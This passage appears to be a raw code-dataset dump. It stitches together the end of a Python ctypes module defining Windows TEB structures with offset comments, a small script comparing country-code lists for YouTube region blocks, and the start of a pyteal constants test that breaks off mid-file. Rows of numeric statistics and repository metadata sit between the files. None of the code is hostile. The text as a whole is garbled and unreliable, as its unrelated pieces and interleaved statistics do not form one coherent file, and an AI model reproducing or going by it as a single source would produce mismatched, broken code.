("SpareBool1", BOOLEAN),
("SpareBool2", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr64 Ptr64 Void
("DeallocationBStore", PVOID),
("BStoreLimit", PVOID),
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("ProcessRundown", DWORD),
("LastSwitchTime", QWORD),
("TotalSwitchOutTime", QWORD),
("WaitReasonBitMap", LONGLONG), # LARGE_INTEGER
]
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStackPointer : Ptr32 _ACTIVATION_CONTEXT_STACK
# +0x1ac SpareBytes : [36] UChar
# +0x1d0 TxFsContext : Uint4B
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Wchar
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorMode : Uint4B
# +0xf2c Instrumentation : [9] Ptr32 Void
# +0xf50 ActivityId : _GUID
# +0xf60 SubProcessTag : Ptr32 Void
# +0xf64 EtwLocalData : Ptr32 Void
# +0xf68 EtwTraceData : Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 CurrentIdealProcessor : _PROCESSOR_NUMBER
# +0xf74 IdealProcessorValue : Uint4B
# +0xf74 ReservedPad0 : UChar
# +0xf75 ReservedPad1 : UChar
# +0xf76 ReservedPad2 : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 GuaranteedStackBytes : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 SavedPriorityState : Ptr32 Void
# +0xf8c SoftPatchPtr1 : Uint4B
# +0xf90 ThreadPoolData : Ptr32 Void
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 MuiGeneration : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 FlsData : Ptr32 Void
# +0xfb8 PreferredLanguages : Ptr32 Void
# +0xfbc UserPrefLanguages : Ptr32 Void
# +0xfc0 MergedPrefLanguages : Ptr32 Void
# +0xfc4 MuiImpersonation : Uint4B
# +0xfc8 CrossTebFlags : Uint2B
# +0xfc8 SpareCrossTebBits : Pos 0, 16 Bits
# +0xfca SameTebFlags : Uint2B
# +0xfca SafeThunkCall : Pos 0, 1 Bit
# +0xfca InDebugPrint : Pos 1, 1 Bit
# +0xfca HasFiberData : Pos 2, 1 Bit
# +0xfca SkipThreadAttach : Pos 3, 1 Bit
# +0xfca WerInShipAssertCode : Pos 4, 1 Bit
# +0xfca RanProcessInit : Pos 5, 1 Bit
# +0xfca ClonedThread : Pos 6, 1 Bit
# +0xfca SuppressDebugMsg : Pos 7, 1 Bit
# +0xfca DisableUserStackWalk : Pos 8, 1 Bit
# +0xfca RtlExceptionAttached : Pos 9, 1 Bit
# +0xfca InitialThread : Pos 10, 1 Bit
# +0xfca SpareSameTebBits : Pos 11, 5 Bits
# +0xfcc TxnScopeEnterCallback : Ptr32 Void
# +0xfd0 TxnScopeExitCallback : Ptr32 Void
# +0xfd4 TxnScopeContext : Ptr32 Void
# +0xfd8 LockCount : Uint4B
# +0xfdc SpareUlong0 : Uint4B
# +0xfe0 ResourceRetValue : Ptr32 Void
class _TEB_2008_R2(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes", UCHAR * 36),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", DWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 9),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("CurrentIdealProcessor", PROCESSOR_NUMBER),
("IdealProcessorValue", DWORD),
("ReservedPad0", UCHAR),
("ReservedPad1", UCHAR),
("ReservedPad2", UCHAR),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr32 Ptr32 Void
("MuiGeneration", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("SpareUlong0", ULONG),
("ResourceRetValue", PVOID),
]
# +0x000 NtTib : _NT_TIB
# +0x038 EnvironmentPointer : Ptr64 Void
# +0x040 ClientId : _CLIENT_ID
# +0x050 ActiveRpcHandle : Ptr64 Void
# +0x058 ThreadLocalStoragePointer : Ptr64 Void
# +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
# +0x068 LastErrorValue : Uint4B
# +0x06c CountOfOwnedCriticalSections : Uint4B
# +0x070 CsrClientThread : Ptr64 Void
# +0x078 Win32ThreadInfo : Ptr64 Void
# +0x080 User32Reserved : [26] Uint4B
# +0x0e8 UserReserved : [5] Uint4B
# +0x100 WOW32Reserved : Ptr64 Void
# +0x108 CurrentLocale : Uint4B
# +0x10c FpSoftwareStatusRegister : Uint4B
# +0x110 SystemReserved1 : [54] Ptr64 Void
# +0x2c0 ExceptionCode : Int4B
# +0x2c8 ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
# +0x2d0 SpareBytes : [24] UChar
# +0x2e8 TxFsContext : Uint4B
# +0x2f0 GdiTebBatch : _GDI_TEB_BATCH
# +0x7d8 RealClientId : _CLIENT_ID
# +0x7e8 GdiCachedProcessHandle : Ptr64 Void
# +0x7f0 GdiClientPID : Uint4B
# +0x7f4 GdiClientTID : Uint4B
# +0x7f8 GdiThreadLocalInfo : Ptr64 Void
# +0x800 Win32ClientInfo : [62] Uint8B
# +0x9f0 glDispatchTable : [233] Ptr64 Void
# +0x1138 glReserved1 : [29] Uint8B
# +0x1220 glReserved2 : Ptr64 Void
# +0x1228 glSectionInfo : Ptr64 Void
# +0x1230 glSection : Ptr64 Void
# +0x1238 glTable : Ptr64 Void
# +0x1240 glCurrentRC : Ptr64 Void
# +0x1248 glContext : Ptr64 Void
# +0x1250 LastStatusValue : Uint4B
# +0x1258 StaticUnicodeString : _UNICODE_STRING
# +0x1268 StaticUnicodeBuffer : [261] Wchar
# +0x1478 DeallocationStack : Ptr64 Void
# +0x1480 TlsSlots : [64] Ptr64 Void
# +0x1680 TlsLinks : _LIST_ENTRY
# +0x1690 Vdm : Ptr64 Void
# +0x1698 ReservedForNtRpc : Ptr64 Void
# +0x16a0 DbgSsReserved : [2] Ptr64 Void
# +0x16b0 HardErrorMode : Uint4B
# +0x16b8 Instrumentation : [11] Ptr64 Void
# +0x1710 ActivityId : _GUID
# +0x1720 SubProcessTag : Ptr64 Void
# +0x1728 EtwLocalData : Ptr64 Void
# +0x1730 EtwTraceData : Ptr64 Void
# +0x1738 WinSockData : Ptr64 Void
# +0x1740 GdiBatchCount : Uint4B
# +0x1744 CurrentIdealProcessor : _PROCESSOR_NUMBER
# +0x1744 IdealProcessorValue : Uint4B
# +0x1744 ReservedPad0 : UChar
# +0x1745 ReservedPad1 : UChar
# +0x1746 ReservedPad2 : UChar
# +0x1747 IdealProcessor : UChar
# +0x1748 GuaranteedStackBytes : Uint4B
# +0x1750 ReservedForPerf : Ptr64 Void
# +0x1758 ReservedForOle : Ptr64 Void
# +0x1760 WaitingOnLoaderLock : Uint4B
# +0x1768 SavedPriorityState : Ptr64 Void
# +0x1770 SoftPatchPtr1 : Uint8B
# +0x1778 ThreadPoolData : Ptr64 Void
# +0x1780 TlsExpansionSlots : Ptr64 Ptr64 Void
# +0x1788 DeallocationBStore : Ptr64 Void
# +0x1790 BStoreLimit : Ptr64 Void
# +0x1798 MuiGeneration : Uint4B
# +0x179c IsImpersonating : Uint4B
# +0x17a0 NlsCache : Ptr64 Void
# +0x17a8 pShimData : Ptr64 Void
# +0x17b0 HeapVirtualAffinity : Uint4B
# +0x17b8 CurrentTransactionHandle : Ptr64 Void
# +0x17c0 ActiveFrame : Ptr64 _TEB_ACTIVE_FRAME
# +0x17c8 FlsData : Ptr64 Void
# +0x17d0 PreferredLanguages : Ptr64 Void
# +0x17d8 UserPrefLanguages : Ptr64 Void
# +0x17e0 MergedPrefLanguages : Ptr64 Void
# +0x17e8 MuiImpersonation : Uint4B
# +0x17ec CrossTebFlags : Uint2B
# +0x17ec SpareCrossTebBits : Pos 0, 16 Bits
# +0x17ee SameTebFlags : Uint2B
# +0x17ee SafeThunkCall : Pos 0, 1 Bit
# +0x17ee InDebugPrint : Pos 1, 1 Bit
# +0x17ee HasFiberData : Pos 2, 1 Bit
# +0x17ee SkipThreadAttach : Pos 3, 1 Bit
# +0x17ee WerInShipAssertCode : Pos 4, 1 Bit
# +0x17ee RanProcessInit : Pos 5, 1 Bit
# +0x17ee ClonedThread : Pos 6, 1 Bit
# +0x17ee SuppressDebugMsg : Pos 7, 1 Bit
# +0x17ee DisableUserStackWalk : Pos 8, 1 Bit
# +0x17ee RtlExceptionAttached : Pos 9, 1 Bit
# +0x17ee InitialThread : Pos 10, 1 Bit
# +0x17ee SpareSameTebBits : Pos 11, 5 Bits
# +0x17f0 TxnScopeEnterCallback : Ptr64 Void
# +0x17f8 TxnScopeExitCallback : Ptr64 Void
# +0x1800 TxnScopeContext : Ptr64 Void
# +0x1808 LockCount : Uint4B
# +0x180c SpareUlong0 : Uint4B
# +0x1810 ResourceRetValue : Ptr64 Void
class _TEB_2008_R2_64(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes", UCHAR * 24),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", QWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 11),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("CurrentIdealProcessor", PROCESSOR_NUMBER),
("IdealProcessorValue", DWORD),
("ReservedPad0", UCHAR),
("ReservedPad1", UCHAR),
("ReservedPad2", UCHAR),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr64 Ptr64 Void
("DeallocationBStore", PVOID),
("BStoreLimit", PVOID),
("MuiGeneration", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("SpareUlong0", ULONG),
("ResourceRetValue", PVOID),
]
_TEB_Vista = _TEB_2008
_TEB_Vista_64 = _TEB_2008_64
_TEB_W7 = _TEB_2008_R2
_TEB_W7_64 = _TEB_2008_R2_64
# Use the correct TEB structure definition.
# Defaults to the latest Windows version.
class TEB(Structure):
_pack_ = 8
if os == 'Windows NT':
_pack_ = _TEB_NT._pack_
_fields_ = _TEB_NT._fields_
elif os == 'Windows 2000':
_pack_ = _TEB_2000._pack_
_fields_ = _TEB_2000._fields_
elif os == 'Windows XP':
_fields_ = _TEB_XP._fields_
elif os == 'Windows XP (64 bits)':
_fields_ = _TEB_XP_64._fields_
elif os == 'Windows 2003':
_fields_ = _TEB_2003._fields_
elif os == 'Windows 2003 (64 bits)':
_fields_ = _TEB_2003_64._fields_
elif os == 'Windows 2008':
_fields_ = _TEB_2008._fields_
elif os == 'Windows 2008 (64 bits)':
_fields_ = _TEB_2008_64._fields_
elif os == 'Windows 2003 R2':
_fields_ = _TEB_2003_R2._fields_
elif os == 'Windows 2003 R2 (64 bits)':
_fields_ = _TEB_2003_R2_64._fields_
elif os == 'Windows 2008 R2':
_fields_ = _TEB_2008_R2._fields_
elif os == 'Windows 2008 R2 (64 bits)':
_fields_ = _TEB_2008_R2_64._fields_
elif os == 'Windows Vista':
_fields_ = _TEB_Vista._fields_
elif os == 'Windows Vista (64 bits)':
_fields_ = _TEB_Vista_64._fields_
elif os == 'Windows 7':
_fields_ = _TEB_W7._fields_
elif os == 'Windows 7 (64 bits)':
_fields_ = _TEB_W7_64._fields_
elif sizeof(SIZE_T) == sizeof(DWORD):
_fields_ = _TEB_W7._fields_
else:
_fields_ = _TEB_W7_64._fields_
PTEB = POINTER(TEB)
#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================
| 47.341385 | 118 | 0.528067 | 11,318 | 162,665 | 7.414738 | 0.094363 | 0.031959 | 0.005291 | 0.007019 | 0.835224 | 0.805088 | 0.793244 | 0.783961 | 0.768363 | 0.753682 | 0 | 0.081101 | 0.378502 | 162,665 | 3,435 | 119 | 47.355167 | 0.749001 | 0.43967 | 0 | 0.799054 | 0 | 0 | 0.24196 | 0.063959 | 0 | 0 | 0.003615 | 0.000291 | 0.003546 | 1 | 0.008274 | false | 0.004728 | 0.001182 | 0.004137 | 0.072695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d9b38552cd43d53bd3aa29f0f9f6852e48aeb97a | 1,998 | py | Python | youtubeAntiBlock.py | Patrolin/scripts | 52b0b7e027d088c51a5c7c625f25dc0757f49f60 | [
"Unlicense"
] | null | null | null | youtubeAntiBlock.py | Patrolin/scripts | 52b0b7e027d088c51a5c7c625f25dc0757f49f60 | [
"Unlicense"
] | 8 | 2020-10-21T12:34:40.000Z | 2021-09-12T14:01:54.000Z | youtubeAntiBlock.py | Patrolin/scripts | 52b0b7e027d088c51a5c7c625f25dc0757f49f60 | [
"Unlicense"
] | null | null | null | # a = [...document.querySelectorAll('table')[0].querySelectorAll('td:nth-child(8n+4)')].map(e => e.innerText);
# console.log(''+a);
# https://en.wikipedia.org/wiki/List_of_ISO_3166_country_codes
countries = '''AF,AD,AE,AG,AI,AL,AM,AO,AQ,AR,AS,AT,AU,AW,AX,AZ,BA,BB,BD,BE,BF,BG,BH,BI,BJ,BL,BM,BN,BO,BQ,BR,BS,BT,BV,BW,BY,BZ,CA,CC,CD,CF,CG,CH,CI,CK,CL,CM,CN,CO,CR,CU,CV,CW,CX,CY,CZ,DE,DJ,DK,DM,DO,DZ,EC,EE,EG,EH,ER,ES,ET,FI,FJ,FK,FM,FO,FR,GA,GB,GD,GE,GF,GG,GH,GI,GL,GM,GN,GP,GQ,GR,GS,GT,GU,GW,GY,HK,HM,HN,HR,HT,HU,ID,IE,IL,IM,IN,IO,IQ,IR,IS,IT,JE,JM,JO,JP,KE,KG,KH,KI,KM,KN,KP,KR,KW,KY,KZ,LA,LB,LC,LI,LK,LR,LS,LT,LU,LV,LY,MA,MC,MD,ME,MF,MG,MH,MK,ML,MM,MN,MO,MP,MQ,MR,MS,MT,MU,MV,MW,MX,MY,MZ,NA,NC,NE,NF,NG,NI,NL,NO,NP,NR,NU,NZ,OM,PA,PE,PF,PG,PH,PK,PL,PM,PN,PR,PS,PT,PW,PY,QA,RE,RO,RS,RU,RW,SA,SB,SC,SD,SE,SG,SH,SI,SJ,SK,SL,SM,SN,SO,SR,SS,ST,SV,SX,SY,SZ,TC,TD,TF,TG,TH,TJ,TK,TL,TM,TN,TO,TR,TT,TV,TW,TZ,UA,UG,UM,US,UY,UZ,VA,VC,VE,VG,VI,VN,VU,WF,WS,YE,YT,ZA,ZM,ZW'''
# a = [...document.querySelectorAll('table')[0].querySelectorAll('td:nth-child(2n+2)')].map(e => e.innerText);
# console.log(''+a);
# https://polsy.org.uk/stuff/ytrestrict.cgi
blocked = '''AD,AE,AF,AG,AI,AL,AM,AO,AQ,AR,AS,AT,AU,AW,AX,AZ,BA,BB,BD,BE,BF,BG,BH,BI,BJ,BL,BM,BN,BO,BQ,BR,BS,BT,BV,BW,BY,BZ,CA,CC,CD,CF,CG,CH,CI,CK,CL,CM,CN,CO,CR,CU,CV,CW,CX,CY,CZ,DE,DJ,DK,DM,DO,DZ,EC,EE,EG,EH,ER,ES,ET,FI,FJ,FK,FM,FO,FR,GA,GB,GD,GE,GF,GG,GH,GI,GL,GM,GN,GP,GQ,GR,GS,GT,GU,GW,GY,HK,HM,HN,HR,HT,HU,ID,IE,IL,IM,IN,IO,IQ,IR,IS,IT,JE,JM,JO,JP,KE,KG,KH,KI,KM,KN,KP,KR,KW,KY,KZ,LA,LB,LC,LI,LK,LR,LS,LT,LU,LV,LY,MA,MC,MD,ME,MF,MG,MH,MK,ML,MM,MN,MO,MP,MQ,MR,MS,MT,MU,MV,MW,MX,MY,MZ,NA,NC,NE,NF,NG,NI,NL,NO,NP,NR,NU,NZ,OM,PA,PE,PF,PG,PH,PK,PL,PM,PN,PR,PS,PT,PW,PY,QA,RE,RO,RS,RU,RW,SA,SB,SC,SD,SE,SG,SH,SI,SJ,SK,SL,SM,SN,SO,SR,SS,ST,SV,SX,SY,SZ,TC,TD,TF,TG,TH,TJ,TK,TL,TM,TN,TO,TR,TT,TV,TW,TZ,UA,UG,UM,US,UY,UZ,VA,VC,VE,VG,VI,VN,VU,WF,WS,YE,YT,ZA,ZM,ZW'''
def asSet(x: str) -> set:
return set(x.split(','))
print(asSet(countries) - asSet(blocked))
| 117.529412 | 764 | 0.665165 | 568 | 1,998 | 2.330986 | 0.512324 | 0.013595 | 0.037764 | 0.045317 | 0.874622 | 0.874622 | 0.874622 | 0.874622 | 0.829305 | 0.743202 | 0 | 0.005115 | 0.021522 | 1,998 | 16 | 765 | 124.875 | 0.672123 | 0.179179 | 0 | 0 | 0 | 0.4 | 0.914268 | 0.913656 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.4 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 11 |
d9c3a2b4b2960b73970e2b3363b8c498b5df1c7c | 21,113 | py | Python | pyteal/compiler/constants_test.py | MikeOwino/pyteal | 4ec401fd258d1f9075d2d057408ca58bfa72f67d | [
"MIT"
] | null | null | null | pyteal/compiler/constants_test.py | MikeOwino/pyteal | 4ec401fd258d1f9075d2d057408ca58bfa72f67d | [
"MIT"
] | null | null | null | pyteal/compiler/constants_test.py | MikeOwino/pyteal | 4ec401fd258d1f9075d2d057408ca58bfa72f67d | [
"MIT"
] | null | null | null | from .. import *
from .constants import (
extractIntValue,
extractBytesValue,
extractAddrValue,
createConstantBlocks,
extractMethodSigValue,
)
def test_extractIntValue():
tests = [
(TealOp(None, Op.int, 0), 0),
(TealOp(None, Op.int, 5), 5),
(TealOp(None, Op.int, "pay"), 1),
(TealOp(None, Op.int, "NoOp"), 0),
(TealOp(None, Op.int, "UpdateApplication"), 4),
(TealOp(None, Op.int, "TMPL_NAME"), "TMPL_NAME"),
]
for op, expected in tests:
actual = extractIntValue(op)
assert actual == expected
def test_extractBytesValue():
tests = [
(TealOp(None, Op.byte, '""'), b""),
(TealOp(None, Op.byte, '"test"'), b"test"),
(TealOp(None, Op.byte, '"\\t\\n\\\\\\""'), b'\t\n\\"'),
(TealOp(None, Op.byte, "0x"), b""),
(TealOp(None, Op.byte, "0x00"), b"\x00"),
(TealOp(None, Op.byte, "0xFF00"), b"\xff\x00"),
(TealOp(None, Op.byte, "0xff00"), b"\xff\x00"),
(TealOp(None, Op.byte, "base32()"), b""),
(TealOp(None, Op.byte, "base32(ORSXG5A)"), b"test"),
(TealOp(None, Op.byte, "base32(ORSXG5A=)"), b"test"),
(TealOp(None, Op.byte, "base64()"), b""),
(TealOp(None, Op.byte, "base64(dGVzdA==)"), b"test"),
(TealOp(None, Op.byte, "TMPL_NAME"), "TMPL_NAME"),
]
for op, expected in tests:
actual = extractBytesValue(op)
assert actual == expected
def test_extractAddrValue():
tests = [
(
TealOp(
None,
Op.byte,
"WSJHNPJ6YCLX5K4GUMQ4ISPK3ABMS3AL3F6CSVQTCUI5F4I65PWEMCWT3M",
),
b"\xb4\x92v\xbd>\xc0\x97~\xab\x86\xa3!\xc4I\xea\xd8\x02\xc9l\x0b\xd9|)V\x13\x15\x11\xd2\xf1\x1e\xeb\xec",
),
(TealOp(None, Op.addr, "TMPL_NAME"), "TMPL_NAME"),
]
for op, expected in tests:
actual = extractAddrValue(op)
assert actual == expected
# test case came from: https://gist.github.com/jasonpaulos/99e4f8a75f2fc2ec9b8073c064530359
def test_extractMethodValue():
tests = [
(
TealOp(None, Op.method_signature, '"create(uint64)uint64"'),
b"\x43\x46\x41\x01",
),
(TealOp(None, Op.method_signature, '"update()void"'), b"\xa0\xe8\x18\x72"),
(
TealOp(None, Op.method_signature, '"optIn(string)string"'),
b"\xcf\xa6\x8e\x36",
),
(TealOp(None, Op.method_signature, '"closeOut()string"'), b"\xa9\xf4\x2b\x3d"),
(TealOp(None, Op.method_signature, '"delete()void"'), b"\x24\x37\x8d\x3c"),
(
TealOp(None, Op.method_signature, '"add(uint64,uint64)uint64"'),
b"\xfe\x6b\xdf\x69",
),
(TealOp(None, Op.method_signature, '"empty()void"'), b"\xa8\x8c\x26\xa5"),
(
TealOp(None, Op.method_signature, '"payment(pay,uint64)bool"'),
b"\x3e\x3b\x3d\x28",
),
(
TealOp(
None,
Op.method_signature,
'"referenceTest(account,application,account,asset,account,asset,asset,application,application)uint8[9]"',
),
b"\x0d\xf0\x05\x0f",
),
]
for op, expected in tests:
actual = extractMethodSigValue(op)
assert actual == expected
def test_createConstantBlocks_empty():
ops = []
expected = ops[:]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_no_consts():
ops = [
TealOp(None, Op.txn, "Sender"),
TealOp(None, Op.txn, "Receiver"),
TealOp(None, Op.eq),
]
expected = ops[:]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_pushint():
ops = [
TealOp(None, Op.int, 0),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.pushint, 0, "//", 0),
TealOp(None, Op.pushint, 1, "//", "OptIn"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
def test_createConstantBlocks_intblock_single():
ops = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, "OptIn"),
TealOp(None, Op.add),
]
expected = [
TealOp(None, Op.intcblock, 1),
TealOp(None, Op.intc_0, "//", 1),
TealOp(None, Op.intc_0, "//", "OptIn"),
TealOp(None, Op.add),
]
actual = createConstantBlocks(ops)
assert actual == expected
